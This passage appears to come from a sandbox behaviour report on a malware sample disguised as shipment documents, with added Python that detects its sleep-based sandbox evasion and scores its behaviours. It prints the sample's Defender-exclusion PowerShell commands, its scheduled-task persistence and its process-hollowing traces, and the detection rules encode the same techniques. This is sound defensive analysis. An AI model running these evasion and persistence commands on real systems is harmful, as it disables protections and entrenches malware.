Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594952s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594496s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594221s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668	Thread sleep time: -594073s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599805
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599469
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599140
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 599024
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598126
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597669
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597533
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597387
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597275
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597154
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 595068
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594624
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594515
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599292
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599175
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 599054
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598836
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597624
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 597078
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596740
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594952
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594496
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594221
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe	Thread delayed: delay time: 594073
Source: rShipmentDocuments.exe, 00000009.00000002.4135329351.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1773124497.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\T
Source: ZOlmYtPdlO.exe, 0000000A.00000002.1764660892.00000000009D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: ZOlmYtPdlO.exe, 00000010.00000002.4136109973.0000000001429000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Code function: 9_2_068F9328 LdrInitializeThunk,9_2_068F9328
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\rShipmentDocuments.exe	Memory allocated: page read and write | page guard
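The sleep evidence above has a shape worth recognising rather than just counting. On TID 1816 of rShipmentDocuments.exe and TID 3668 of ZOlmYtPdlO.exe the requested delay starts at 600000 and shrinks by roughly 110 on every call; that is what a loop which re-sleeps for "deadline minus now" produces when each sleep returns early, which is consistent with a sandbox that shortens sleeps being resisted by a fixed ten-minute deadline. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses lines in the report's "Thread sleep" format (including the fused "TID: 1816Thread sleep time" form as extracted) and, per thread, flags an untimed wait, counts long sleeps, and detects the countdown pattern. Two readings of the numbers are assumptions, not statements of the report: the magnitude is taken as milliseconds (600000 then lines up with ten minutes and the -30000 threshold with 30 s), and 922337203685477 (Int64.MaxValue divided by 10000) is treated as an untimed wait and reported rather than summed. The sample input is a constructed handful of lines copied from the evidence above.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the "Thread sleep" evidence lines above;
# the values are taken from the report, the set is trimmed to a few lines.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -600000s >= -30000s",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599805s >= -30000s",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599687s >= -30000s",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816 Thread sleep time: -599578s >= -30000s",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688 Thread sleep count: 5031 > 30",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 9520 > 30",
]

# \s* before "Thread" accepts both the spaced form and the fused form the
# extracted page shows ("TID: 1816Thread sleep time"). Image paths with
# spaces are not handled; none occur in this report.
LINE_RE = re.compile(
    r"Source:\s+(?P<image>\S+)\s+TID:\s+(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>time|count):\s+(?P<value>-?\d+)"
)

# Assumptions about the report's numbers (not stated by the report): the
# magnitude is the requested delay in milliseconds, and 922337203685477
# (Int64.MaxValue / 10000) is how an untimed wait appears, so it is flagged
# rather than added to the total.
INFINITE_MS = 922337203685477
LONG_SLEEP_MS = 30_000  # the sandbox's own threshold as printed (>= 30000)


def parse(lines):
    """Group sleep evidence per (image, tid): list of requested delays and the
    largest 'sleep count' reported for that thread."""
    threads = defaultdict(lambda: {"sleeps": [], "sleep_calls": 0})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["image"], int(m["tid"]))
        value = abs(int(m["value"]))  # relative delays are printed negative
        if m["kind"] == "time":
            threads[key]["sleeps"].append(value)
        else:
            threads[key]["sleep_calls"] = max(threads[key]["sleep_calls"], value)
    return threads


def is_countdown(delays, max_step_ms=1000):
    """True when successive requested delays shrink by small positive steps:
    the shape of a loop that re-sleeps for the time left until a fixed
    deadline after each early return."""
    if len(delays) < 3:
        return False
    steps = [a - b for a, b in zip(delays, delays[1:])]
    return all(0 < s <= max_step_ms for s in steps)


def analyse(lines):
    """Per-thread summary: untimed wait seen, longest and total finite delay,
    number of long sleeps, countdown pattern, and reported sleep-call count."""
    report = {}
    for key, t in parse(lines).items():
        finite = [s for s in t["sleeps"] if s != INFINITE_MS]
        report[key] = {
            "infinite": INFINITE_MS in t["sleeps"],
            "longest_ms": max(finite, default=0),
            "total_ms": sum(finite),
            "long_sleeps": sum(1 for s in finite if s >= LONG_SLEEP_MS),
            "countdown": is_countdown(finite),
            "sleep_calls": t["sleep_calls"],
        }
    return report


if __name__ == "__main__":
    for (image, tid), r in analyse(SAMPLE_LINES).items():
        print(f"{image} TID {tid}: {r}")
```

Run against the full evidence list, the countdown flag separates the deadline loop on TID 1816 and TID 3668 from the one-off untimed waits on the PowerShell threads, which are ordinary blocking waits and not by themselves evidence of evasion.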

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Memory written: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
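The rows before the heading (thread delays of 594221 and 594073, roughly ten minutes each if the sandbox reports milliseconds, plus the VMware SCSI CD-ROM and Hyper-V strings) and the rows under it (Defender exclusions added through powershell.exe, a scheduled task imported from an XML file in Temp, the sample spawning a copy of its own image, and an MZ header written into that copy at base 0x400000) are the raw material for detection rules. The Python below is an added example; it is not part of the Joe Sandbox report or of the tooling that produced it. It re-encodes those rows as constructed event dictionaries (command lines and paths copied from the rows, two notepad rows invented as benign controls), runs one rule per behaviour over them and returns which rules fired, from which process, with a rough additive score. The event schema, rule names, weights and the three-minute sleep threshold are assumptions chosen for the example.

```python
import re

# Constructed sample events modelled on the report rows above: command lines and paths
# are copied from those rows; the two notepad rows are invented benign controls.
SAMPLE_EVENTS = [
    {"type": "process_created", "parent": r"C:\Users\user\Desktop\rShipmentDocuments.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"'},
    {"type": "process_created", "parent": r"C:\Users\user\Desktop\rShipmentDocuments.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"'},
    {"type": "process_created", "parent": r"C:\Users\user\Desktop\rShipmentDocuments.exe",
     "image": r"C:\Users\user\Desktop\rShipmentDocuments.exe",
     "cmdline": r'"C:\Users\user\Desktop\rShipmentDocuments.exe"'},
    {"type": "memory_written", "source": r"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe",
     "target": r"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe", "base": 0x400000, "prefix": b"\x4d\x5a"},
    {"type": "thread_delayed", "source": r"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe", "delay_ms": 594221},
    {"type": "memory_string", "source": "ZOlmYtPdlO.exe",
     "string": r"\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"},
    {"type": "memory_string", "source": "rShipmentDocuments.exe", "string": r"Hyper-V RAW%SystemRoot%\system32\mswsock.dll"},
    {"type": "process_created", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
    {"type": "thread_delayed", "source": r"C:\Windows\System32\notepad.exe", "delay_ms": 500},
]

LONG_SLEEP_MS = 3 * 60 * 1000   # assumed threshold: a single delay of three minutes or more
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Device/vendor names are strong VM evidence. "Hyper-V RAW" is the Winsock catalog entry of the
# Hyper-V sockets provider, present on every current Windows install, so it is weighted zero.
STRONG_VM_MARKERS = ("vmware", "necvmwar", "vbox", "virtualbox", "qemu")
WEAK_VM_MARKERS = ("hyper-v raw",)
WEIGHTS = {"defender_exclusion": 40, "pe_written_into_process": 30, "scheduled_task_xml_from_temp": 25,
           "self_spawn": 10, "long_sleep": 10, "vm_artifact_strong": 10, "vm_artifact_weak": 0}

def rule_defender_exclusion(ev):
    """powershell.exe adding a Defender exclusion; the process that spawned it is reported."""
    if ev["type"] == "process_created" and "powershell" in ev["image"].lower() and re.search(
            r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", ev["cmdline"], re.I):
        return "defender_exclusion", ev["parent"]

def rule_schtasks_xml_from_temp(ev):
    """schtasks /Create importing its task definition from the user's Temp directory."""
    if ev["type"] != "process_created" or not ev["image"].lower().endswith("\\schtasks.exe"):
        return None
    xml = re.search(r'/xml\s+"?([^"]+)', ev["cmdline"], re.I)
    if re.search(r"/create\b", ev["cmdline"], re.I) and xml and TEMP_DIR.search(xml.group(1)):
        return "scheduled_task_xml_from_temp", ev["parent"]

def rule_self_spawn(ev):
    """A process starting a second copy of its own image, the usual hollowing target."""
    if ev["type"] == "process_created" and ev["parent"].lower() == ev["image"].lower():
        return "self_spawn", ev["parent"]

def rule_pe_written(ev):
    """A PE header (MZ, bytes 4D 5A) written into a process, as at base 0x400000 above."""
    if ev["type"] == "memory_written" and ev["prefix"].startswith(b"MZ"):
        return "pe_written_into_process", ev["source"]

def rule_long_sleep(ev):
    if ev["type"] == "thread_delayed" and ev["delay_ms"] >= LONG_SLEEP_MS:
        return "long_sleep", ev["source"]

def rule_vm_artifact(ev):
    if ev["type"] != "memory_string":
        return None
    s = ev["string"].lower()
    if any(m in s for m in STRONG_VM_MARKERS):
        return "vm_artifact_strong", ev["source"]
    if any(m in s for m in WEAK_VM_MARKERS):
        return "vm_artifact_weak", ev["source"]

RULES = (rule_defender_exclusion, rule_schtasks_xml_from_temp, rule_self_spawn,
         rule_pe_written, rule_long_sleep, rule_vm_artifact)

def triage(events):
    """Map each rule name that fired to the responsible process paths, in event order."""
    findings = {}
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.setdefault(hit[0], []).append(hit[1])
    return findings

def score(findings):
    """Additive score capped at 100; a rule counts once however many events matched it."""
    return min(100, sum(WEIGHTS[name] for name in findings))

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for name, sources in found.items():
        print(f"{name:30} {len(sources)} hit(s), first from {sources[0]}")
    print("score:", score(found))
```

Two caveats come straight from the rows. The image paths are under SysWOW64 while the command lines name System32: the sample is a 32-bit process, so WOW64 file-system redirection rewrites the path it asked for, and a rule keyed on the System32 directory misses the launch; match on the file name instead, as above. And the "Hyper-V RAW%SystemRoot%\system32\mswsock.dll" string is the Winsock catalog entry for the Hyper-V sockets provider, which exists on a physical host as well, so only the NECVMWar/VMware device path is treated as evidence of the sandbox. The exclusion rule also matches only a plaintext command line; an -EncodedCommand variant has to be base64-decoded before it is fed in.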
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Queries volume information (VolumeInformation) on the files below, listed in order of first query; "(xN)" marks a file queried N times. Font-file queries of this kind are typically produced by GDI+/System.Drawing enumerating the Fonts directory when a WinForms application starts (the GAC assemblies loaded just before them are System.Windows.Forms, System.Drawing and Accessibility) and are not by themselves an evasion indicator.
                    C:\Users\user\Desktop\rShipmentDocuments.exe
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                    C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                    C:\Windows\Fonts\ (file names only):
                    bahnschrift.ttf (x10), calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc (x2),
                    Candara.ttf, Candaral.ttf, Candarai.ttf, Candarali.ttf, Candarab.ttf, Candaraz.ttf,
                    comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf, constan.ttf, constani.ttf, constanb.ttf, constanz.ttf,
                    corbel.ttf, corbell.ttf, corbeli.ttf, corbelli.ttf, corbelb.ttf, corbelz.ttf, cour.ttf, couri.ttf, courbd.ttf, courbi.ttf,
                    ebrima.ttf, ebrimabd.ttf, framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF, FRAMDCN.TTF, FRAHV.TTF, gadugi.ttf, gadugib.ttf,
                    georgia.ttf, georgiai.ttf, georgiab.ttf, georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf,
                    LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf, malgunsl.ttf, malgunbd.ttf, himalaya.ttf,
                    msjh.ttc (x2), msjhl.ttc (x2), msjhbd.ttc (x2), ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf, micross.ttf, taileb.ttf,
